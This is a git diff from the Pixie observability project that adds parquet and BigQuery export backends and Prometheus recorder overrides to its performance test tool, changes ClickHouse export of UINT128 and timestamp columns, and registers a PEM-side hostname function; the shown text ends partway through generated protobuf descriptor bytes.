summary.png ({len(runs)} runs stacked)") + + render_scorecard(runs, args.sweep_dir / "scorecard.png") + print(f" scorecard.png ({len(runs)} runs in bar chart)") + + render_alert_distribution(runs, args.sweep_dir / "alerts.png") + print(f" alerts.png ({len(runs)} runs, alert ramp vs RUN-relative time)") + + render_scaling(runs, args.sweep_dir / "scaling.png") + print(f" scaling.png ({len(runs)} runs, log-log KPI vs multiplier)") + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml index 33389dffb2e..f8370a1f7e1 100644 --- a/skaffold/skaffold_vizier.yaml +++ b/skaffold/skaffold_vizier.yaml @@ -81,6 +81,7 @@ profiles: path: /build/artifacts/context=./bazel/args value: - --compilation_mode=opt + - --config=x86_64_sysroot - name: heap patches: - op: add diff --git a/src/carnot/exec/clickhouse_export_sink_node.cc b/src/carnot/exec/clickhouse_export_sink_node.cc index 6a11a42d37a..c7000ab99d4 100644 --- a/src/carnot/exec/clickhouse_export_sink_node.cc +++ b/src/carnot/exec/clickhouse_export_sink_node.cc @@ -35,6 +35,9 @@ namespace px { namespace carnot { namespace exec { +// TODO(ddelnano): Defend against columns that don't exist. These should be +// ignored by the Node. 
+
 using table_store::schema::RowBatch;
 using table_store::schema::RowDescriptor;
 
@@ -148,12 +151,12 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons
       break;
     }
     case types::UINT128: {
-      // UINT128 is exported as STRING (UUID format)
+      // UINT128 is exported as STRING in "high:low" format to match
+      // the ClickHouseSourceNode's parsing in clickhouse_source_node.cc
       auto col = std::make_shared<clickhouse::ColumnString>();
       for (int64_t i = 0; i < num_rows; ++i) {
        auto val = types::GetValueFromArrowArray<types::UINT128>(arrow_col.get(), i);
-        std::string uuid_str = sole::rebuild(absl::Uint128High64(val), absl::Uint128Low64(val)).str();
-        col->Append(uuid_str);
+        col->Append(absl::Substitute("$0:$1", absl::Uint128High64(val), absl::Uint128Low64(val)));
       }
       block.AppendColumn(mapping.clickhouse_column_name(), col);
       break;
@@ -164,6 +167,34 @@ Status ClickHouseExportSinkNode::ConsumeNextImpl(ExecState* /*exec_state*/, cons
     }
   }
 
+  // Auto-derive event_time from time_ if time_ is present but event_time is not.
+  // The ClickHouse table schema uses event_time (DateTime64(3), milliseconds) for
+  // partitioning and ordering, but the Pixie table has time_ (TIME64NS, nanoseconds).
+  bool has_time_ = false;
+  bool has_event_time = false;
+  int time_col_index = -1;
+  for (const auto& mapping : plan_node_->column_mappings()) {
+    if (mapping.clickhouse_column_name() == "time_") {
+      has_time_ = true;
+      time_col_index = mapping.input_column_index();
+    }
+    if (mapping.clickhouse_column_name() == "event_time") {
+      has_event_time = true;
+    }
+  }
+
+  if (has_time_ && !has_event_time && time_col_index >= 0) {
+    auto arrow_col = rb.ColumnAt(time_col_index);
+    int64_t num_rows = arrow_col->length();
+    auto event_time_col = std::make_shared<clickhouse::ColumnDateTime64>(3);
+    for (int64_t i = 0; i < num_rows; ++i) {
+      int64_t ns_val = types::GetValueFromArrowArray<types::TIME64NS>(arrow_col.get(), i);
+      // Convert nanoseconds to milliseconds for DateTime64(3).
+      event_time_col->Append(ns_val / 1000000LL);
+    }
+    block.AppendColumn("event_time", event_time_col);
+  }
+
   // Insert the block into ClickHouse
   clickhouse_client_->Insert(plan_node_->table_name(), block);
diff --git a/src/carnot/funcs/metadata/metadata_ops.cc b/src/carnot/funcs/metadata/metadata_ops.cc
index 3fe4e21692d..d6409e6f456 100644
--- a/src/carnot/funcs/metadata/metadata_ops.cc
+++ b/src/carnot/funcs/metadata/metadata_ops.cc
@@ -127,6 +127,7 @@ void RegisterMetadataOpsOrDie(px::carnot::udf::Registry* registry) {
   registry->RegisterOrDie<UPIDToDeploymentIDUDF>("upid_to_deployment_id");
   registry->RegisterOrDie<UPIDToStringUDF>("upid_to_string");
   registry->RegisterOrDie<HostnameUDF>("_exec_hostname");
+  registry->RegisterOrDie<PEMHostnameUDF>("_pem_hostname");
   registry->RegisterOrDie<HostNumCPUsUDF>("_exec_host_num_cpus");
   registry->RegisterOrDie<VizierIDUDF>("vizier_id");
   registry->RegisterOrDie<VizierNameUDF>("vizier_name");
diff --git a/src/carnot/funcs/metadata/metadata_ops.h b/src/carnot/funcs/metadata/metadata_ops.h
index 241079858a4..af82f9738f8 100644
--- a/src/carnot/funcs/metadata/metadata_ops.h
+++ b/src/carnot/funcs/metadata/metadata_ops.h
@@ -2926,6 +2926,33 @@ class HostnameUDF : public ScalarUDF {
   }
 };
 
+class PEMHostnameUDF : public ScalarUDF {
+ public:
+  /**
+   * @brief Gets the hostname of the PEM agent's machine.
+   * Unlike _exec_hostname (UDF_ALL), this is restricted to UDF_PEM so the
+   * distributed planner is forced to execute it on the PEM before data is
+   * shipped to Kelvin. Use this when the hostname must reflect the agent
+   * that collected the data rather than the agent that exports it.
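+   * For example, in an export pipeline whose ClickHouse sink is scheduled on
+   * Kelvin, _exec_hostname may resolve there and stamp every row with
+   * Kelvin's hostname; _pem_hostname always returns the collecting node's.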
+ */ + StringValue Exec(FunctionContext* ctx) { + auto md = GetMetadataState(ctx); + return md->hostname(); + } + + static udf::ScalarUDFDocBuilder Doc() { + return udf::ScalarUDFDocBuilder("Get the hostname of the PEM agent.") + .Details( + "Get the hostname of the PEM agent that collected the data. " + "This UDF is restricted to PEM execution, so the distributed planner " + "will always run it on the PEM even when the downstream sink is on Kelvin.") + .Example("df.hostname = px._pem_hostname()") + .Returns("The hostname of the PEM agent."); + } + + static udfspb::UDFSourceExecutor Executor() { return udfspb::UDFSourceExecutor::UDF_PEM; } +}; + class HostNumCPUsUDF : public ScalarUDF { public: /** diff --git a/src/e2e_test/perf_tool/cmd/BUILD.bazel b/src/e2e_test/perf_tool/cmd/BUILD.bazel index 012fd3488b0..23540786c4b 100644 --- a/src/e2e_test/perf_tool/cmd/BUILD.bazel +++ b/src/e2e_test/perf_tool/cmd/BUILD.bazel @@ -33,6 +33,7 @@ go_library( "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/cluster/gke", "//src/e2e_test/perf_tool/pkg/cluster/local", + "//src/e2e_test/perf_tool/pkg/exporter", "//src/e2e_test/perf_tool/pkg/pixie", "//src/e2e_test/perf_tool/pkg/run", "//src/e2e_test/perf_tool/pkg/suites", diff --git a/src/e2e_test/perf_tool/cmd/run.go b/src/e2e_test/perf_tool/cmd/run.go index 5d8a89a9f7a..3eb9c8855c4 100644 --- a/src/e2e_test/perf_tool/cmd/run.go +++ b/src/e2e_test/perf_tool/cmd/run.go @@ -45,6 +45,7 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/gke" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster/local" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" "px.dev/pixie/src/e2e_test/perf_tool/pkg/run" "px.dev/pixie/src/e2e_test/perf_tool/pkg/suites" @@ -74,9 +75,15 @@ func init() { RunCmd.Flags().String("api_key", "", "The Pixie API key to use for deploying pixie") RunCmd.Flags().String("cloud_addr", "withpixie.ai:443", "The Pixie Cloud address to use for deploying pixie") + RunCmd.Flags().String("export_backend", "bq", "Export backend: 'bq', 'parquet-gcs', or 'parquet-local'") RunCmd.Flags().String("bq_project", "pl-pixies", "The gcloud project to put bigquery results/specs in") RunCmd.Flags().String("bq_dataset", "px_perf", "The name of the bigquery dataset to put results/specs in") RunCmd.Flags().String("bq_dataset_loc", "us-west1", "The gcloud region for the bigquery dataset") + RunCmd.Flags().String("gcs_bucket", "", "GCS bucket for parquet export (required when export_backend=parquet-gcs)") + RunCmd.Flags().String("gcs_prefix", "", "Path prefix within the GCS bucket for parquet export") + RunCmd.Flags().String("parquet_dir", "", "Local directory for parquet export (required when export_backend=parquet-local)") + RunCmd.Flags().String("parquet_prefix", "", "Path prefix within --parquet_dir for parquet export") + RunCmd.Flags().Int("parquet_batch_size", 10000, "Number of rows per parquet file when using a parquet-* backend") RunCmd.Flags().String("gke_project", "pl-pixies", "The gcloud project to use for GKE clusters") RunCmd.Flags().String("gke_zone", "us-west1-a", "The gcloud zone to use for GKE clusters") @@ -95,6 +102,10 @@ func init() { RunCmd.Flags().String("ds_experiment_page_id", "p_g7fj6pf4yc", "The unique ID of the datastudio experiment page, used to print links to datastudio views") RunCmd.Flags().Bool("pretty", false, "Pretty print output json") + RunCmd.Flags().StringSlice("prom_recorder_override", []string{}, "Override 
kubeconfig/kube_context for a named prometheus recorder. Format: name=kubeconfig_path:kube_context (either side may be empty). Repeatable.") + RunCmd.Flags().Bool("keep_on_failure", false, "If the experiment fails, skip teardown (stop vizier/workloads/recorders and cluster cleanup) so the cluster state can be inspected. Implies --max_retries=1.") + RunCmd.Flags().String("skaffold_stderr_file", "", "If set, skaffold's stderr (build/render output) is appended to this file in addition to perf_tool's stderr. Useful in CI to capture a clean log to cat after a failure.") + RootCmd.AddCommand(RunCmd) } @@ -131,6 +142,15 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { return err } + promOverrides, err := parsePromRecorderOverrides(viper.GetStringSlice("prom_recorder_override")) + if err != nil { + log.WithError(err).Error("failed to parse --prom_recorder_override flags") + return err + } + for _, spec := range specs { + applyPromRecorderOverrides(spec, promOverrides) + } + var c cluster.Provider if viper.GetBool("use_local_cluster") { c = &local.ClusterProvider{} @@ -162,20 +182,24 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { } } - resultTable, err := createResultTable() + metricsExporter, err := createExporter(ctx) if err != nil { - log.WithError(err).Error("failed to create results table") - return err - } - specTable, err := createSpecTable() - if err != nil { - log.WithError(err).Error("failed to create spec table") + log.WithError(err).Error("failed to create exporter") return err } + defer metricsExporter.Close() containerRegistryRepo := viper.GetString("container_repo") + skaffoldStderrFile := viper.GetString("skaffold_stderr_file") maxRetries := viper.GetInt("max_retries") numRuns := viper.GetInt("num_runs") + keepOnFailure := viper.GetBool("keep_on_failure") + if keepOnFailure { + if maxRetries > 1 { + log.Warn("--keep_on_failure is set; forcing --max_retries=1 to avoid retries racing with preserved cluster state") + } + maxRetries = 1 + } eg := errgroup.Group{} experiments := make(chan *exp, len(specs)*numRuns) @@ -189,7 +213,7 @@ func runCmd(ctx context.Context, cmd *cobra.Command) error { s := spec n := name eg.Go(func() error { - expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, resultTable, specTable, containerRegistryRepo, maxRetries) + expID, err := runExperiment(ctx, s, c, pxAPIKey, pxCloudAddr, metricsExporter, containerRegistryRepo, skaffoldStderrFile, maxRetries, keepOnFailure) if err != nil { log.WithError(err).Error("failed to run experiment") return err @@ -257,10 +281,11 @@ func runExperiment( c cluster.Provider, pxAPIKey string, pxCloudAddr string, - resultTable *bq.Table, - specTable *bq.Table, + metricsExporter exporter.Exporter, containerRegistryRepo string, + skaffoldStderrFile string, maxRetries int, + keepOnFailure bool, ) (uuid.UUID, error) { var expID uuid.UUID bo := &maxRetryBackoff{ @@ -268,7 +293,8 @@ func runExperiment( } op := func() error { pxCtx := pixie.NewContext(pxAPIKey, pxCloudAddr) - r := run.NewRunner(c, pxCtx, resultTable, specTable, containerRegistryRepo) + r := run.NewRunner(c, pxCtx, metricsExporter, containerRegistryRepo, skaffoldStderrFile) + r.SetKeepOnFailure(keepOnFailure) var err error expID, err = uuid.NewV4() if err != nil { @@ -335,7 +361,32 @@ func getExperimentSpecs() (map[string]*experimentpb.ExperimentSpec, error) { return nil, errors.New("must specify one of --experiment_proto or --suite") } -func createResultTable() (*bq.Table, error) { +func createExporter(ctx context.Context) 
(exporter.Exporter, error) { + switch viper.GetString("export_backend") { + case "bq": + return createBQExporter() + case "parquet-gcs": + bucket := viper.GetString("gcs_bucket") + if bucket == "" { + return nil, errors.New("--gcs_bucket is required when using parquet-gcs backend") + } + prefix := viper.GetString("gcs_prefix") + batchSize := viper.GetInt("parquet_batch_size") + return exporter.NewParquetGCSExporter(ctx, bucket, prefix, batchSize) + case "parquet-local": + dir := viper.GetString("parquet_dir") + if dir == "" { + return nil, errors.New("--parquet_dir is required when using parquet-local backend") + } + prefix := viper.GetString("parquet_prefix") + batchSize := viper.GetInt("parquet_batch_size") + return exporter.NewParquetLocalExporter(dir, prefix, batchSize) + default: + return nil, fmt.Errorf("unknown export backend: %s", viper.GetString("export_backend")) + } +} + +func createBQExporter() (*exporter.BQExporter, error) { bqProject := viper.GetString("bq_project") bqDataset := viper.GetString("bq_dataset") bqDatasetLoc := viper.GetString("bq_dataset_loc") @@ -343,15 +394,16 @@ func createResultTable() (*bq.Table, error) { Type: bigquery.DayPartitioningType, Field: "timestamp", } - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, run.ResultRow{}) -} - -func createSpecTable() (*bq.Table, error) { - bqProject := viper.GetString("bq_project") - bqDataset := viper.GetString("bq_dataset") - bqDatasetLoc := viper.GetString("bq_dataset_loc") - var timePartitioning *bigquery.TimePartitioning - return bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", timePartitioning, run.SpecRow{}) + resultTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "results", timePartitioning, exporter.ResultRow{}) + if err != nil { + return nil, err + } + var specTimePartitioning *bigquery.TimePartitioning + specTable, err := bq.NewTableForStruct(bqProject, bqDataset, bqDatasetLoc, "specs", specTimePartitioning, exporter.SpecRow{}) + if err != nil { + return nil, err + } + return exporter.NewBQExporter(resultTable, specTable), nil } func getNumNodesInCluster(ctx context.Context, c cluster.Provider) (int, error) { @@ -388,3 +440,50 @@ func datastudioLink(dsReportID string, dsExperimentPageID string, expID uuid.UUI encodedParams := url.QueryEscape(params) return fmt.Sprintf("https://datastudio.google.com/reporting/%s/page/%s?params=%s", dsReportID, dsExperimentPageID, encodedParams) } + +type promRecorderOverride struct { + KubeconfigPath string + KubeContext string +} + +func parsePromRecorderOverrides(raw []string) (map[string]promRecorderOverride, error) { + out := make(map[string]promRecorderOverride, len(raw)) + for _, s := range raw { + nameAndVal := strings.SplitN(s, "=", 2) + if len(nameAndVal) != 2 || nameAndVal[0] == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: expected name=kubeconfig:context", s) + } + parts := strings.SplitN(nameAndVal[1], ":", 2) + ov := promRecorderOverride{KubeconfigPath: parts[0]} + if len(parts) == 2 { + ov.KubeContext = parts[1] + } + if ov.KubeconfigPath == "" && ov.KubeContext == "" { + return nil, fmt.Errorf("invalid --prom_recorder_override %q: at least one of kubeconfig or context must be set", s) + } + out[nameAndVal[0]] = ov + } + return out, nil +} + +func applyPromRecorderOverrides(spec *experimentpb.ExperimentSpec, overrides map[string]promRecorderOverride) { + if len(overrides) == 0 { + return + } + for _, m := range spec.MetricSpecs { + prom := m.GetProm() + if 
prom == nil || prom.Name == "" { + continue + } + ov, ok := overrides[prom.Name] + if !ok { + continue + } + if ov.KubeconfigPath != "" { + prom.KubeconfigPath = ov.KubeconfigPath + } + if ov.KubeContext != "" { + prom.KubeContext = ov.KubeContext + } + } +} diff --git a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go index dc43e5d79be..923ed6cc1b9 100755 --- a/src/e2e_test/perf_tool/experimentpb/experiment.pb.go +++ b/src/e2e_test/perf_tool/experimentpb/experiment.pb.go @@ -647,8 +647,9 @@ func (m *PatchTarget) GetAnnotationSelector() string { } type PrerenderedDeploy struct { - YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` - Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + YAMLPaths []string `protobuf:"bytes,1,rep,name=yaml_paths,json=yamlPaths,proto3" json:"yaml_paths,omitempty"` + Patches []*PatchSpec `protobuf:"bytes,2,rep,name=patches,proto3" json:"patches,omitempty"` + SkipNamespaceDelete bool `protobuf:"varint,3,opt,name=skip_namespace_delete,json=skipNamespaceDelete,proto3" json:"skip_namespace_delete,omitempty"` } func (m *PrerenderedDeploy) Reset() { *m = PrerenderedDeploy{} } @@ -697,6 +698,13 @@ func (m *PrerenderedDeploy) GetPatches() []*PatchSpec { return nil } +func (m *PrerenderedDeploy) GetSkipNamespaceDelete() bool { + if m != nil { + return m.SkipNamespaceDelete + } + return false +} + type SkaffoldDeploy struct { SkaffoldPath string `protobuf:"bytes,1,opt,name=skaffold_path,json=skaffoldPath,proto3" json:"skaffold_path,omitempty"` SkaffoldArgs []string `protobuf:"bytes,2,rep,name=skaffold_args,json=skaffoldArgs,proto3" json:"skaffold_args,omitempty"` @@ -1254,6 +1262,9 @@ type PrometheusScrapeSpec struct { Port int32 `protobuf:"varint,4,opt,name=port,proto3" json:"port,omitempty"` ScrapePeriod *types.Duration `protobuf:"bytes,5,opt,name=scrape_period,json=scrapePeriod,proto3" json:"scrape_period,omitempty"` MetricNames map[string]string `protobuf:"bytes,6,rep,name=metric_names,json=metricNames,proto3" json:"metric_names,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` + KubeconfigPath string `protobuf:"bytes,7,opt,name=kubeconfig_path,json=kubeconfigPath,proto3" json:"kubeconfig_path,omitempty"` + KubeContext string `protobuf:"bytes,8,opt,name=kube_context,json=kubeContext,proto3" json:"kube_context,omitempty"` + Name string `protobuf:"bytes,9,opt,name=name,proto3" json:"name,omitempty"` } func (m *PrometheusScrapeSpec) Reset() { *m = PrometheusScrapeSpec{} } @@ -1330,6 +1341,27 @@ func (m *PrometheusScrapeSpec) GetMetricNames() map[string]string { return nil } +func (m *PrometheusScrapeSpec) GetKubeconfigPath() string { + if m != nil { + return m.KubeconfigPath + } + return "" +} + +func (m *PrometheusScrapeSpec) GetKubeContext() string { + if m != nil { + return m.KubeContext + } + return "" +} + +func (m *PrometheusScrapeSpec) GetName() string { + if m != nil { + return m.Name + } + return "" +} + type ClusterSpec struct { NumNodes int32 `protobuf:"varint,1,opt,name=num_nodes,json=numNodes,proto3" json:"num_nodes,omitempty"` Node *NodeSpec `protobuf:"bytes,2,opt,name=node,proto3" json:"node,omitempty"` @@ -1560,119 +1592,124 @@ func init() { } var fileDescriptor_96d7e52dda1e6fe3 = []byte{ - // 1786 bytes of a gzipped FileDescriptorProto - 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xac, 0x58, 0xcd, 0x73, 0x1b, 0x49, - 0x15, 0xd7, 
0x48, 0xb2, 0x25, 0x3d, 0xc9, 0xb2, 0xdc, 0xf9, 0x40, 0xf1, 0xa6, 0xe4, 0xec, 0x6c, - 0x01, 0x21, 0xec, 0x5a, 0x24, 0xcb, 0x87, 0xd9, 0x2c, 0x5b, 0x25, 0xc9, 0x06, 0x2b, 0x71, 0x6c, - 0xd1, 0xf2, 0x7a, 0x61, 0x8b, 0xaa, 0xa9, 0xf6, 0x4c, 0x47, 0x9a, 0xf2, 0x7c, 0x65, 0xba, 0x95, - 0xb5, 0x39, 0x71, 0xa1, 0x38, 0x51, 0xc5, 0x01, 0xfe, 0x03, 0x0e, 0xfc, 0x09, 0xdc, 0x39, 0x00, - 0xb7, 0x1c, 0xf7, 0xe4, 0x22, 0xca, 0x85, 0xe3, 0x1e, 0xb8, 0x43, 0xf5, 0xc7, 0x8c, 0x46, 0xb2, - 0x92, 0x40, 0x15, 0xb7, 0x9e, 0x5f, 0xff, 0xde, 0xeb, 0xd7, 0xaf, 0xfb, 0xf7, 0x5e, 0x4b, 0xf0, - 0x5d, 0x16, 0xdb, 0x6d, 0xfa, 0x80, 0x5a, 0x9c, 0x32, 0xde, 0x8e, 0x68, 0xfc, 0xd4, 0xe2, 0x61, - 0xe8, 0xb5, 0xe9, 0x79, 0x44, 0x63, 0xd7, 0xa7, 0x01, 0x8f, 0x4e, 0x33, 0x1f, 0xdb, 0x51, 0x1c, - 0xf2, 0x10, 0xd5, 0xa2, 0xf3, 0xed, 0x94, 0xbb, 0xd9, 0x1a, 0x85, 0xe1, 0xc8, 0xa3, 0x6d, 0x39, - 0x77, 0x3a, 0x79, 0xda, 0x76, 0x26, 0x31, 0xe1, 0x6e, 0x18, 0x28, 0xf6, 0xe6, 0xf5, 0x51, 0x38, - 0x0a, 0xe5, 0xb0, 0x2d, 0x46, 0x0a, 0x35, 0xff, 0x9d, 0x87, 0xfa, 0x5e, 0xea, 0x78, 0x18, 0x51, - 0x1b, 0x3d, 0x84, 0xea, 0x73, 0xf7, 0x97, 0x2e, 0x8d, 0x2d, 0x16, 0x51, 0xbb, 0x69, 0xdc, 0x31, - 0xee, 0x56, 0x1f, 0x6c, 0x6e, 0x67, 0x17, 0xdb, 0xfe, 0x2c, 0x8c, 0xcf, 0xbc, 0x90, 0x38, 0xc2, - 0x00, 0x83, 0xa2, 0x4b, 0xe3, 0x0e, 0xd4, 0xbf, 0xd0, 0x73, 0xd2, 0x9c, 0x35, 0xf3, 0x77, 0x0a, - 0x6f, 0xb1, 0x5f, 0xfb, 0x22, 0xf3, 0xc5, 0xd0, 0x43, 0xa8, 0xf9, 0x94, 0xc7, 0xae, 0xad, 0x1d, - 0x14, 0xa4, 0x83, 0xe6, 0xbc, 0x83, 0x27, 0x92, 0x21, 0xcd, 0xab, 0x7e, 0x3a, 0x66, 0xe8, 0x63, - 0xa8, 0xd9, 0xde, 0x84, 0xf1, 0x24, 0xfa, 0xa2, 0x8c, 0xfe, 0xd6, 0xbc, 0x71, 0x4f, 0x31, 0x94, - 0xb5, 0x3d, 0xfb, 0x40, 0xdf, 0x81, 0x72, 0x3c, 0x09, 0x94, 0xe5, 0x8a, 0xb4, 0xbc, 0x31, 0x6f, - 0x89, 0x27, 0x81, 0xb4, 0x2a, 0xc5, 0x6a, 0x80, 0xde, 0x07, 0xb0, 0x43, 0xdf, 0x77, 0xb9, 0xc5, - 0xc6, 0xa4, 0xb9, 0x7a, 0xc7, 0xb8, 0x5b, 0xe9, 0xae, 0x4d, 0x2f, 0xb7, 0x2a, 0x3d, 0x89, 0x0e, - 0xf7, 0x3b, 0xb8, 0xa2, 0x08, 0xc3, 0x31, 0x41, 0x08, 0x8a, 0x9c, 0x8c, 0x58, 0xb3, 0x74, 0xa7, - 0x70, 0xb7, 0x82, 0xe5, 0xd8, 0xfc, 0xab, 0x01, 0xb5, 0x6c, 0x3a, 0x04, 0x29, 0x20, 0x3e, 0x95, - 0x89, 0xaf, 0x60, 0x39, 0x16, 0x39, 0x71, 0x68, 0xe4, 0x85, 0x17, 0x16, 0xe3, 0x34, 0x4a, 0x92, - 0xba, 0x90, 0x93, 0x5d, 0xc9, 0x18, 0x72, 0x1a, 0xe1, 0xaa, 0x93, 0x8e, 0x19, 0xfa, 0x11, 0xd4, - 0xc6, 0x94, 0x78, 0x7c, 0x6c, 0x8f, 0xa9, 0x7d, 0x96, 0x24, 0x74, 0x21, 0x27, 0xfb, 0x92, 0xd1, - 0x13, 0x0c, 0x3c, 0x47, 0x47, 0xdf, 0x84, 0x75, 0x62, 0x8b, 0x8b, 0x64, 0x31, 0xea, 0x51, 0x9b, - 0x87, 0xb1, 0xcc, 0x6a, 0x05, 0xd7, 0x15, 0x3c, 0xd4, 0xa8, 0xf9, 0x77, 0x03, 0x60, 0x16, 0x03, - 0xea, 0x41, 0x35, 0x8a, 0x69, 0x4c, 0x03, 0x87, 0xc6, 0xd4, 0xd1, 0xf7, 0x68, 0x6b, 0x7e, 0xd5, - 0xc1, 0x8c, 0xa0, 0x2c, 0xf7, 0x73, 0x38, 0x6b, 0x85, 0x3e, 0x82, 0x32, 0x3b, 0x23, 0x4f, 0x9f, - 0x86, 0x9e, 0xd3, 0xcc, 0x4b, 0x0f, 0xb7, 0xe7, 0x3d, 0x0c, 0xf5, 0x6c, 0x6a, 0x9e, 0xf2, 0xd1, - 0xb7, 0x21, 0x1f, 0x9d, 0x37, 0x0b, 0xcb, 0x6e, 0xc0, 0xe0, 0xbc, 0x77, 0xd0, 0x4f, 0x4d, 0xf2, - 0xd1, 0x79, 0x77, 0x0d, 0x74, 0xce, 0x2c, 0x7e, 0x11, 0x51, 0xf3, 0xf7, 0x06, 0x54, 0x33, 0x29, - 0x41, 0x1f, 0x43, 0xe1, 0x6c, 0x87, 0x2d, 0xdf, 0xc4, 0xe3, 0x9d, 0xe1, 0x20, 0x74, 0x18, 0xa6, - 0xc4, 0xb9, 0x90, 0xec, 0x6e, 0x69, 0x7a, 0xb9, 0x55, 0x78, 0xbc, 0x33, 0xdc, 0xcf, 0x61, 0x61, - 0x86, 0x7e, 0x08, 0x85, 0xe8, 0xdc, 0x5b, 0xbe, 0x81, 0xc1, 0xf9, 0x41, 0x66, 0x21, 0x65, 0x2a, - 0xb0, 0x1c, 0x16, 0x36, 0xdd, 0x1a, 0x80, 0x3c, 0x07, 0x15, 0xd6, 0x7d, 0xd8, 0xb8, 0xb2, 0x1a, - 0xba, 0x0d, 0x15, 0x71, 0x49, 0x58, 
0x44, 0xec, 0xe4, 0xd6, 0xcc, 0x00, 0xf3, 0x08, 0xea, 0xf3, - 0x4b, 0xa0, 0x9b, 0xb0, 0xca, 0xec, 0xd8, 0x8d, 0xb8, 0x26, 0xeb, 0x2f, 0xf4, 0x75, 0xa8, 0xb3, - 0x89, 0x6d, 0x53, 0xc6, 0x2c, 0x3b, 0xf4, 0x26, 0x7e, 0x20, 0x03, 0xae, 0xe0, 0x35, 0x8d, 0xf6, - 0x24, 0x68, 0xfe, 0x02, 0x2a, 0x03, 0xc2, 0xed, 0xb1, 0xbc, 0xac, 0xb7, 0xa1, 0x78, 0x41, 0x7c, - 0x4f, 0x79, 0xea, 0x96, 0xa7, 0x97, 0x5b, 0xc5, 0x9f, 0x77, 0x9e, 0x1c, 0x60, 0x89, 0xa2, 0xfb, - 0xb0, 0xca, 0x49, 0x3c, 0xa2, 0x5c, 0x6f, 0x7d, 0xf1, 0x14, 0x84, 0x9b, 0x63, 0x49, 0xc0, 0x9a, - 0x68, 0xfe, 0x26, 0x0f, 0xd5, 0x0c, 0x8e, 0xbe, 0x05, 0x15, 0x12, 0xb9, 0xd6, 0x28, 0x0e, 0x27, - 0x91, 0x5e, 0xa5, 0x36, 0xbd, 0xdc, 0x2a, 0x77, 0x06, 0xfd, 0x9f, 0x08, 0x0c, 0x97, 0x49, 0xe4, - 0xca, 0x11, 0x6a, 0x43, 0x55, 0x50, 0x9f, 0xd3, 0x98, 0xb9, 0xa1, 0x0e, 0xbe, 0x5b, 0x9f, 0x5e, - 0x6e, 0x41, 0x67, 0xd0, 0x3f, 0x51, 0x28, 0x06, 0x12, 0xb9, 0x7a, 0x2c, 0x94, 0x76, 0xe6, 0x06, - 0x8e, 0xbc, 0x22, 0x15, 0x2c, 0xc7, 0xa9, 0xfa, 0x8a, 0x19, 0xf5, 0xcd, 0x25, 0x78, 0x65, 0x21, - 0xc1, 0x22, 0x6d, 0x1e, 0x39, 0xa5, 0xde, 0x4c, 0x1e, 0xab, 0x2a, 0x6d, 0x12, 0x4d, 0xd4, 0x81, - 0xda, 0x70, 0x8d, 0x04, 0x41, 0xc8, 0xc9, 0xbc, 0x94, 0x4a, 0x92, 0x8b, 0x66, 0x53, 0xa9, 0x9c, - 0x38, 0x6c, 0x5c, 0x91, 0x87, 0xa8, 0x37, 0x22, 0xb3, 0x56, 0x44, 0xf8, 0x58, 0x5c, 0xc7, 0x42, - 0x52, 0x6f, 0x44, 0xd6, 0x07, 0x02, 0xc4, 0x15, 0x41, 0x90, 0x43, 0x74, 0x1f, 0x4a, 0x91, 0xc8, - 0x25, 0x4d, 0x2a, 0xc6, 0xd7, 0x96, 0x1c, 0x80, 0x2a, 0x68, 0x9a, 0x67, 0xfe, 0xd6, 0x80, 0xfa, - 0xbc, 0xa6, 0xd0, 0x7b, 0xb0, 0x96, 0x68, 0x4a, 0xae, 0xab, 0xaf, 0x4d, 0x2d, 0x01, 0xc5, 0x5a, - 0x73, 0x24, 0x12, 0x8f, 0xd4, 0x82, 0x19, 0x52, 0x27, 0x1e, 0xcd, 0xc5, 0x53, 0xf8, 0x2f, 0xe3, - 0xb9, 0x80, 0x6a, 0x46, 0xac, 0xe2, 0x78, 0xa4, 0x77, 0x43, 0x55, 0x50, 0x31, 0x46, 0x2d, 0x80, - 0xf4, 0x34, 0x92, 0x75, 0x33, 0x08, 0xfa, 0x3e, 0xd4, 0x19, 0xe5, 0x56, 0xd2, 0x17, 0x5c, 0x75, - 0xe0, 0xe5, 0x6e, 0x63, 0x7a, 0xb9, 0x55, 0x1b, 0x52, 0xae, 0xdb, 0x41, 0x7f, 0x17, 0xd7, 0xd8, - 0xec, 0xcb, 0x31, 0xff, 0x6c, 0x00, 0xcc, 0xfa, 0x0c, 0xda, 0x51, 0x22, 0x56, 0x25, 0xe0, 0x9d, - 0x2b, 0x22, 0x1e, 0x4a, 0x11, 0x09, 0xe6, 0xa2, 0x86, 0xd1, 0x0e, 0x14, 0xa3, 0x38, 0xf4, 0xb5, - 0x08, 0xcc, 0xc5, 0x12, 0x18, 0xfa, 0x94, 0x8f, 0xe9, 0x84, 0x0d, 0xed, 0x98, 0x44, 0x54, 0x78, - 0xd8, 0xcf, 0x61, 0x69, 0xb1, 0xac, 0xf6, 0x3a, 0xcb, 0x6a, 0xaf, 0x28, 0x5f, 0xba, 0x69, 0xca, - 0x3a, 0x31, 0x2d, 0xc0, 0xda, 0x5c, 0x4c, 0xaf, 0x15, 0xfd, 0x6d, 0xa8, 0x30, 0x1e, 0x53, 